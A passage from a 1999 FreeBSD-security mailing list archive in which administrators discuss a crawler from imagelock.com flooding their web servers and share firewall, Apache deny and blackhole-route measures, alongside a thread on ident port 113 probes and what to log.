poisoned pages - apparently quitting only when it > > didn't find any images to fingerprint. So they're now blocked here at the > > firewall too - thanks for the heads-up. Wonder how much they can sell > > their service for when they find they don't have access to poke around? > > Great information! Thanks Brett. I checked our httpd logs and > immediately found several thousand hits from this subnet, which is now > filtered. > > Imagelock could be another name for Cyveillance.com. We saw an > identical pattern 2 months ago from another IP which had/has no reverse > DNS. The domain turned out to be Cyveillance and their ISP was (at the > time) Digex.net who forwarded our complaint and followed up twice. > Thank you Digex! > > After 3 complaints to Digex and Cyveillance we finally received this > response from Cyveillance: > > > Recently Digex, our internet provider, forwarded your inquiry regarding > > visits to your site from 207.87.178.66. > > > > We provide companies with brand protection services on the internet. To > > accomplish this goal we employ search engines / web crawlers to scan the > > internet. We are in no way involved with the creation of unsolicited > > commercial email. Please see our web site at http://www.cyveillance.com > > where you can learn more about our company and what we do. > > > > It appears we crawled your web site as part of our general web search, and > > crawled your mailto directories as part of that search. We hope we didn't > > cause you any inconvenience. > > > > If you have any questions, don't hesitate to contact me. > > > > Paul K. Witting > > Manager of Information Systems > > Cyveillance - Intelligent Internet Surveillance > > PWitting@Cyveillance.com > > (703) 519-4212 > > However they never did stop scanning our subnets until we filtered > their subnet at 207.87.178. > > This subnet still has no reverse DNS however `whois` shows Cyveillance > is now a customer of imaphost.com and namesecure.com. "imaphost.com" > is already in our IP filter list (all 27 lines of it) for previous HTTP > abuses however namesecure.com is not. > > Call me paraniod but it sure looks like another Cyveillance attempt to > cover their tracks. > > -- > Roger Marquis > Roble Systems Consulting > http://www.roble.com/ > > - > [To unsubscribe, send mail to majordomo@lists.gnac.net with > "unsubscribe firewalls" in the body of the message.] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 20:50:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id 4C6641509A for ; Sun, 23 May 1999 20:50:28 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id NAA18603; Mon, 24 May 1999 13:20:24 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA05968; Mon, 24 May 1999 13:21:17 +0930 Date: Mon, 24 May 1999 13:21:16 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: Unknow User Cc: freebsd-security@freebsd.org Subject: Re: user uses xv3.10a (PNG) to halt my system. In-Reply-To: <3740B863.6C20B59E@tdnet.com.br> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 17 May 1999, Unknow User wrote: > probably, this is not the most suitable mailing list to post this mesg, > but it's not worth to subscribe fbsd-questions only to get a answer. (if > you hate me for that, ignore me) This question was already answered on freebsd-hackers. Why are you asking again here? Kris > Gustavo Rios ----- "That suit's sharper than a page of Oscar Wilde witticisms that's been rolled up into a point, sprinkled with lemon juice and jabbed into someone's eye" "Wow, that's sharp!" - Ace Rimmer and the Cat, _Red Dwarf_ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 20:51: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 3AFE815021 for ; Sun, 23 May 1999 20:51:04 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id VAA78550; Sun, 23 May 1999 21:49:49 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA16498; Sun, 23 May 1999 21:50:09 -0600 (MDT) Message-Id: <199905240350.VAA16498@harmony.village.org> To: "Kenneth D. Merry" Subject: Re: Denial of service attack from "imagelock.com" Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Sun, 23 May 1999 21:08:52 MDT." <199905240308.VAA22141@panzer.plutotech.com> References: <199905240308.VAA22141@panzer.plutotech.com> Date: Sun, 23 May 1999 21:50:09 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199905240308.VAA22141@panzer.plutotech.com> "Kenneth D. Merry" writes: : I checked a web server I administer, and sure enough, it got hit by : imagelock.com two days ago. I may just firewall them. :) We got hit as well. Since we're behind a ISDN line, they are history and now well filtered. Bastards. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 22: 0:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from relay.acadiau.ca (relay.acadiau.ca [131.162.2.90]) by hub.freebsd.org (Postfix) with ESMTP id 7330615143 for ; Sun, 23 May 1999 22:00:17 -0700 (PDT) (envelope-from 026809r@dragon.acadiau.ca) Received: from dragon.acadiau.ca (dragon.acadiau.ca [131.162.1.79]) by relay.acadiau.ca (8.8.5/8.8.5) with ESMTP id CAA13865; Mon, 24 May 1999 02:00:15 -0300 (ADT) Received: from localhost (026809r@localhost) by dragon.acadiau.ca (8.8.8+Sun/8.8.8) with ESMTP id CAA13183; Mon, 24 May 1999 02:00:13 -0300 (ADT) Date: Mon, 24 May 1999 02:00:12 -0300 (ADT) From: Michael Richards <026809r@dragon.acadiau.ca> X-Sender: 026809r@dragon To: Brett Glass Cc: freebsd-security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" In-Reply-To: <4.2.0.37.19990523191423.04639500@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 23 May 1999, Brett Glass wrote: > The Webmasters on this list may want to look over their logs to see > if they've been hit and not known it. grep your logs for imagelock.com; > if you find that they're abusing your server, you may want to firewall I noticed we were hit by them this evening. 1250 requests in a few minutes. Since we're not running a firewall, is there a recommended method of filtering such people out? I think I did it with apache, but I'm wondering if there is a better method. -Michael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 22: 6:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from the-rowan.albatross.co.nz (ns.albatross.co.nz [203.97.5.1]) by hub.freebsd.org (Postfix) with ESMTP id 9CEAA14CB9 for ; Sun, 23 May 1999 22:06:38 -0700 (PDT) (envelope-from drew@albatross.co.nz) Received: from zair (drew@zair.csarc.otago.ac.nz [139.80.20.4]) by the-rowan.albatross.co.nz (8.9.1/8.9.1) with SMTP id RAA20266 for ; Mon, 24 May 1999 17:04:22 +1200 Message-Id: <4.1.19990524165706.00a63150@pern.csarc.otago.ac.nz> X-Sender: drew@mail.albatross.co.nz X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Mon, 24 May 1999 16:59:55 +1200 To: freebsd-security@FreeBSD.ORG From: Drew Whittle Subject: Re: Denial of service attack from "imagelock.com" In-Reply-To: References: <4.2.0.37.19990523191423.04639500@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Everyone, I have had my fill of imagelock.com, could everyone who has been hit by them email me privately and let me know what impact it has had on you? (I'm going to collate it all, and see if I can use to get them to stop.) Also if you know of others who have been hit by this that aren't on the list, please ask them to email me with details. (No I do _NOT_ want 6 Gig of logs in my mail box!) Regards, Drew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 22: 8: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id A527014DA9 for ; Sun, 23 May 1999 22:07:58 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id XAA00479; Sun, 23 May 1999 23:05:18 -0600 (MDT) Message-Id: <4.2.0.37.19990523230210.0457f8a0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Sun, 23 May 1999 23:05:15 -0600 To: Michael Richards <026809r@dragon.acadiau.ca> From: Brett Glass Subject: Re: Denial of service attack from "imagelock.com" Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: <4.2.0.37.19990523191423.04639500@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Without a firewall either internally or externally, your best bet is to put "deny from 209.133.111" in your .htaccess file or in Apache's access.conf file. You should also complain to dlr@above.net and abuse@above.net. Include some log excerpts to show the nature of the attack. --Brett At 02:00 AM 5/24/99 -0300, Michael Richards wrote: >On Sun, 23 May 1999, Brett Glass wrote: > > > The Webmasters on this list may want to look over their logs to see > > if they've been hit and not known it. grep your logs for imagelock.com; > > if you find that they're abusing your server, you may want to firewall >I noticed we were hit by them this evening. 1250 requests in a few >minutes. Since we're not running a firewall, is there a recommended method >of filtering such people out? I think I did it with apache, but I'm >wondering if there is a better method. > >-Michael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 23:39:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id BE48D15242 for ; Sun, 23 May 1999 23:39:31 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id IAA02806; Mon, 24 May 1999 08:39:30 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id IAA11148; Mon, 24 May 1999 08:39:26 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Michael Richards <026809r@dragon.acadiau.ca> Cc: Brett Glass , freebsd-security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" In-reply-to: Your message of "Mon, 24 May 1999 02:00:12 -0300." Date: Mon, 24 May 1999 08:39:26 +0200 Message-ID: <11146.927527966@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Michael Richards writes: >On Sun, 23 May 1999, Brett Glass wrote: > >> The Webmasters on this list may want to look over their logs to see >> if they've been hit and not known it. grep your logs for imagelock.com; >> if you find that they're abusing your server, you may want to firewall >I noticed we were hit by them this evening. 1250 requests in a few >minutes. Since we're not running a firewall, is there a recommended method >of filtering such people out? I think I did it with apache, but I'm >wondering if there is a better method. Add a blackhole route to them: route add -net -netmask 127.0.0.1 -blackhole -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 0:41: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from 001101.zer0.org (001101.zer0.org [206.24.105.163]) by hub.freebsd.org (Postfix) with ESMTP id 0386F14CBF for ; Mon, 24 May 1999 00:40:59 -0700 (PDT) (envelope-from gsutter@001101.zer0.org) Received: (from gsutter@localhost) by 001101.zer0.org (8.9.2/8.9.2) id AAA22059; Mon, 24 May 1999 00:40:09 -0700 (PDT) (envelope-from gsutter) Date: Mon, 24 May 1999 00:40:09 -0700 From: Gregory Sutter To: Josef Grosch Cc: freebsd-security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" Message-ID: <19990524004009.I93974@001101.zer0.org> References: <199905231424140440.0E81E3D5@quaggy.ursine.com> <19990523185630.A57604@ontario.mooseriver.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <19990523185630.A57604@ontario.mooseriver.com>; from Josef Grosch on Sun, May 23, 1999 at 06:56:30PM -0700 Organization: Zer0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 23, 1999 at 06:56:30PM -0700, Josef Grosch wrote: > > Where can one find webpoison? All the web servers I run, including my > little test server on my home machine, have been scanned by imagelock.com. wpoison, not webpoison, may be found at . It compiles cleanly on 2.x and 3.x and is easy to configure by modifying bits of source. Greg -- Gregory S. Sutter Cole's Law: Thinly sliced cabbage. mailto:gsutter@pobox.com http://www.pobox.com/~gsutter/ PGP DSS public key 0x40AE3052 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 0:59:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.tepucom.nl (mail.tepucom.nl [195.81.12.5]) by hub.freebsd.org (Postfix) with ESMTP id 591EC14CB9 for ; Mon, 24 May 1999 00:59:51 -0700 (PDT) (envelope-from theo@tepucom.nl) Received: from theo.tepucom.nl (localhost [127.0.0.1]) by mail.tepucom.nl (8.8.5/SCO5) with SMTP id JAA03692 for ; Mon, 24 May 1999 09:58:53 +0200 (CETDST) Received: by theo.tepucom.nl with Microsoft Mail id <01BEA5CD.798B3EC0@theo.tepucom.nl>; Mon, 24 May 1999 10:09:13 +-200 Message-ID: <01BEA5CD.798B3EC0@theo.tepucom.nl> From: Theo Purmer To: "'freebsd-security@FreeBSD.ORG'" Subject: why not take this a little further (proposal) Date: Mon, 24 May 1999 10:09:11 +-200 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There has been a lot off postings about that imagelock dos attack. Why not take this a little further and setup a "place" where these forms off abuse can be reported and are monitored. When found to be abusive, (sub)nets can then be added to a list which is periodically distriuted to update the ipfw scripts of subcribers. I know there are a lot of security issues surrounding this but i think it should be possible. Also if enough firewalls are frequently updated with this list one would not like his/her (sub)net on the list so maybe people think twice before doing what imagelock is doing Theo Purmer Tepucom To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 1: 5: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id E9E8C14CB9 for ; Mon, 24 May 1999 01:05:02 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id KAA03322; Mon, 24 May 1999 10:05:01 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id KAA11497; Mon, 24 May 1999 10:04:57 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Theo Purmer Cc: "'freebsd-security@FreeBSD.ORG'" Subject: Re: why not take this a little further (proposal) In-reply-to: Your message of "Mon, 24 May 1999 10:09:11." <01BEA5CD.798B3EC0@theo.tepucom.nl> Date: Mon, 24 May 1999 10:04:57 +0200 Message-ID: <11495.927533097@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Far more efficiently: use BGP routes like MAPS does. Poul-Henning In message <01BEA5CD.798B3EC0@theo.tepucom.nl>, Theo Purmer writes: >There has been a lot off postings about that >imagelock dos attack. > >Why not take this a little further and setup a "place" >where these forms off abuse can be reported and >are monitored. When found to be abusive, (sub)nets >can then be added to a list which is periodically >distriuted to update the ipfw scripts of subcribers. > >I know there are a lot of security issues surrounding this >but i think it should be possible. > >Also if enough firewalls are frequently updated with this list >one would not like his/her (sub)net on the list so maybe people >think twice before doing what imagelock is doing > >Theo Purmer >Tepucom > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 5:12:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 3F26314FF8 for ; Mon, 24 May 1999 05:12:28 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id OAA89920; Mon, 24 May 1999 14:12:23 +0200 (CEST) (envelope-from des) To: "Bert Kellerman" Cc: "Matthew Dillon" , Subject: Re: Denial of service attack from "imagelock.com" References: <4.2.0.37.19990522105949.0465d4a0@localhost> <199905221714.KAA74179@apollo.backplane.com> <009401bea570$09546a80$5f64a8c0@crackhouse.com> From: Dag-Erling Smorgrav Date: 24 May 1999 14:12:22 +0200 In-Reply-To: "Bert Kellerman"'s message of "Sun, 23 May 1999 19:00:21 -0400" Message-ID: Lines: 9 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Bert Kellerman" writes: > You need UDP connectivity to perform a successful traceroute from a UNIX > client..not TCP. [...] Bullshit. RTFM. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 6:44:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from urca.domain.com.br (urca.domain.com.br [200.196.128.8]) by hub.freebsd.org (Postfix) with ESMTP id 0631714EBC for ; Mon, 24 May 1999 06:44:39 -0700 (PDT) (envelope-from jfassad@domain.com.br) X-Internal-ID: 374461ED0001709E Received: from domain.com.br (200.196.128.253) by urca.domain.com.br (NPlex 2.0.123) for freebsd-security@FreeBSD.ORG; Mon, 24 May 1999 10:37:38 -0300 Message-ID: <37492DE5.2822267@domain.com.br> Date: Mon, 24 May 1999 10:45:57 +0000 From: Joao Assad X-Mailer: Mozilla 4.08 [en] (X11; I; FreeBSD 3.2-STABLE i386) MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" References: <199905231424140440.0E81E3D5@quaggy.ursine.com> <4.2.0.37.19990523191423.04639500@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > At 06:11 PM 5/23/99 -0700, David Babler wrote: > > >hey get it, and ignore it. They're just sucking up all files they see, > >since, as I said, I have webpoison installed. Webpoison is intended to > >befuddle brain-dead spam address harvesters by generating an infinite > >number of "interesting" pseudo-random web pages containing what look like > >more links (more webpoison pages) and email addresses (all bogus). The > >links on the page are invisible to humans and included in the robots.txt > >file, so legitimate robots never should go there. Our imagelock.com > >friends spent a LONG time there. > > Dave, could you write the people at noc@above.net and abuse@above.net > and tell them that? Ignoring the robots.txt file amounts to unauthorized > access -- big time. That's serious Web abuse. > > The Webmasters on this list may want to look over their logs to see > if they've been hit and not known it. grep your logs for imagelock.com; > if you find that they're abusing your server, you may want to firewall > them out and complain to ABOVE.NET. Damn they scanned all my servers, I didnt check before because I though they wouldnt be interested in a .br server.... Seems like they got here coming through our tucows mirror and once they got in our network they started scanning all our servers. In my logs I see a 10 secs interval between each request. Cheers Joao Assad To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 6:48:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from amanda.qmpgmc.ac.uk (amanda.qmpgmc.ac.uk [194.81.5.1]) by hub.freebsd.org (Postfix) with ESMTP id DA45314DFB for ; Mon, 24 May 1999 06:48:17 -0700 (PDT) (envelope-from greg@qmpgmc.ac.uk) Received: from greg (gquinlan [194.81.0.56]) by amanda.qmpgmc.ac.uk (8.9.3/8.9.3) with SMTP id OAA14176 for ; Mon, 24 May 1999 14:48:21 +0100 (BST) Message-ID: <013a01bea5ec$0a572220$380051c2@greg.qmpgmc.ac.uk> Reply-To: "Greg Quinlan" From: "Greg Quinlan" To: Subject: Re: Server trying to connect to Port 113 Date: Mon, 24 May 1999 14:48:01 +0100 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.2106.4 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks So will it effect anything by opening port 113? ...(getting 2000 or so log entries from the same server) Greg (ps. Remember to reply all, not on the list) -----Original Message----- From: Jan B. Koum To: Greg Quinlan ; freebsd-security@FreeBSD.ORG Date: 23 May 1999 12:55 Subject: Re: Server trying to connect to Port 113 >On Fri, May 21, 1999 at 09:31:37AM +0100, Greg Quinlan wrote: >> I am not on the mailing list so please include me in your reply. >> >> Can someone explain what this remote system is trying to do? >> >> May 21 09:22:14 amanda /kernel: ipfw: 24110 Deny TCP :1937 > ip>:113 in via fxp1 >> May 21 09:22:35 amanda last message repeated 3 times >> >> Extract from /etc/services >> >> auth 113/tcp ident tap #Authentication Service >> auth 113/udp ident tap #Authentication Service >> >> Greg > > Might be sendmail on going back into your box to get >ident info. Or this might be provoced by something else - like tcp >wrappers, irc, etc, etc... > >-- Yan > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 7: 1:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 563C3153BE for ; Mon, 24 May 1999 07:01:46 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id QAA90196; Mon, 24 May 1999 16:01:30 +0200 (CEST) (envelope-from des) To: "Greg Quinlan" Cc: Subject: Re: Server trying to connect to Port 113 References: <013a01bea5ec$0a572220$380051c2@greg.qmpgmc.ac.uk> From: Dag-Erling Smorgrav Date: 24 May 1999 16:01:30 +0200 In-Reply-To: "Greg Quinlan"'s message of "Mon, 24 May 1999 14:48:01 +0100" Message-ID: Lines: 11 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Greg Quinlan" writes: > So will it effect anything by opening port 113? ...(getting 2000 or so log > entries from the same server) Don't log, or at least, don't log connections to ports to which you excpect benign (if misguided) traffic, such as auth and the netbios ports. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 7: 7:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from www.netlabs.net (www.netlabs.net [216.116.128.3]) by hub.freebsd.org (Postfix) with ESMTP id 05B69153E7 for ; Mon, 24 May 1999 07:07:12 -0700 (PDT) (envelope-from keerf@www.netlabs.net) Received: (from keerf@localhost) by www.netlabs.net (8.9.2/8.9.0) id KAA02587 for freebsd-security@FreeBSD.ORG; Mon, 24 May 1999 10:07:11 -0400 (EDT) Date: Mon, 24 May 1999 10:07:11 -0400 (EDT) From: Terry Warner Message-Id: <199905241407.KAA02587@www.netlabs.net> To: freebsd-security@FreeBSD.ORG Subject: Monitering Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Can anyone recommend a good System moniter .. for like detecting DoS attacks and such .. and which can log to files? if so please get back to me .. Thank you Terry Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 7:17:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from idea.co.uk (ultra2.idea.co.uk [194.36.20.11]) by hub.freebsd.org (Postfix) with ESMTP id 6ABE314BD3 for ; Mon, 24 May 1999 07:16:14 -0700 (PDT) (envelope-from kiril@idea.co.uk) Received: (from kiril@localhost) by idea.co.uk (8.9.2/8.9.2) id PAA02162; Mon, 24 May 1999 15:07:14 +0100 (BST) From: Kiril Mitev Message-Id: <199905241407.PAA02162@idea.co.uk> Subject: Re: Denial of service attack from "imagelock.com" To: brett@lariat.org (Brett Glass) Date: Mon, 24 May 1999 15:07:14 +0100 (BST) Cc: freebsd-security@freebsd.org In-Reply-To: <4.2.0.37.19990522171752.04638eb0@localhost> from "Brett Glass" at May 22, 99 05:24:16 pm X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > At 11:29 AM 5/22/99 -0700, Rodney W. Grimes wrote: > > >Did you even try the simple way: > > > > Yes, I did. Unfortunately, there's no way of telling whether the > company is what it says it is or why it would have attempted to > hit the server with so many rapid-fire requests from multiple IP > addresses. I've been trying to contact the company and hopefully > we will know soon. However, in the meantime, I'd STRONGLY recommend > that people firewall its IPs -- 209.133.111/24. At best, they're > terribly misguided; at worse, they're outright malicious. 3rd option: they/you/both have a slow line, and someone was in a hurry to suck your whole web site...by running several copies of a web crawler or something. i've had to slap people in the wrist for that before :-), since OUR firewall/proxy starts buckling under such a load.... just my tuppence Kiril > > --Brett Glass > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 7:32:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from idea.co.uk (ultra2.idea.co.uk [194.36.20.11]) by hub.freebsd.org (Postfix) with ESMTP id 1C32314BD3 for ; Mon, 24 May 1999 07:31:12 -0700 (PDT) (envelope-from kiril@idea.co.uk) Received: (from kiril@localhost) by idea.co.uk (8.9.2/8.9.2) id PAA02615; Mon, 24 May 1999 15:22:29 +0100 (BST) From: Kiril Mitev Message-Id: <199905241422.PAA02615@idea.co.uk> Subject: Re: Server trying to connect to Port 113 To: des@flood.ping.uio.no (Dag-Erling Smorgrav) Date: Mon, 24 May 1999 15:22:29 +0100 (BST) Cc: greg@qmpgmc.ac.uk, freebsd-security@FreeBSD.ORG In-Reply-To: from "Dag-Erling Smorgrav" at May 24, 99 04:01:30 pm X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > "Greg Quinlan" writes: > > So will it effect anything by opening port 113? ...(getting 2000 or so log > > entries from the same server) > > Don't log, or at least, don't log connections to ports to which you > excpect benign (if misguided) traffic, such as auth and the netbios > ports. i beg to disagree, any access attempt from 'outside' to any netbios ports are 99% indicative of a break-in attempt. in my experience, at least K > > DES > -- > Dag-Erling Smorgrav - des@flood.ping.uio.no > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 7:38:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id AE73214BD3 for ; Mon, 24 May 1999 07:38:26 -0700 (PDT) (envelope-from ark@eltex.ru) Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id SAA29914; Mon, 24 May 1999 18:38:08 +0400 (MSD) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Mon, 24 May 1999 18:37:34 +0400 Received: from undisclosed-intranet-sender id xma014994; Mon, 24 May 99 18:37:30 +0400 Date: Mon, 24 May 1999 18:37:21 +0400 Message-Id: <199905241437.SAA23349@paranoid.eltex.spb.ru> In-Reply-To: <199905241422.PAA02615@idea.co.uk> from "Kiril Mitev " From: ark@eltex.ru Organization: "Klingon Imperial Intelligence Service" Subject: Re: Server trying to connect to Port 113 To: kiril@ideaglobal.com Cc: des@flood.ping.uio.no, (Dag-Erling,Smorgrav), greg@qmpgmc.ac.uk, freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, Ever seen netbios name requests from misconfigured servers (cretins like www.intel.ru and so on)? Kiril Mitev said : > > > > "Greg Quinlan" writes: > > > So will it effect anything by opening port 113? ...(getting 2000 or so log > > > entries from the same server) > > > > Don't log, or at least, don't log connections to ports to which you > > excpect benign (if misguided) traffic, such as auth and the netbios > > 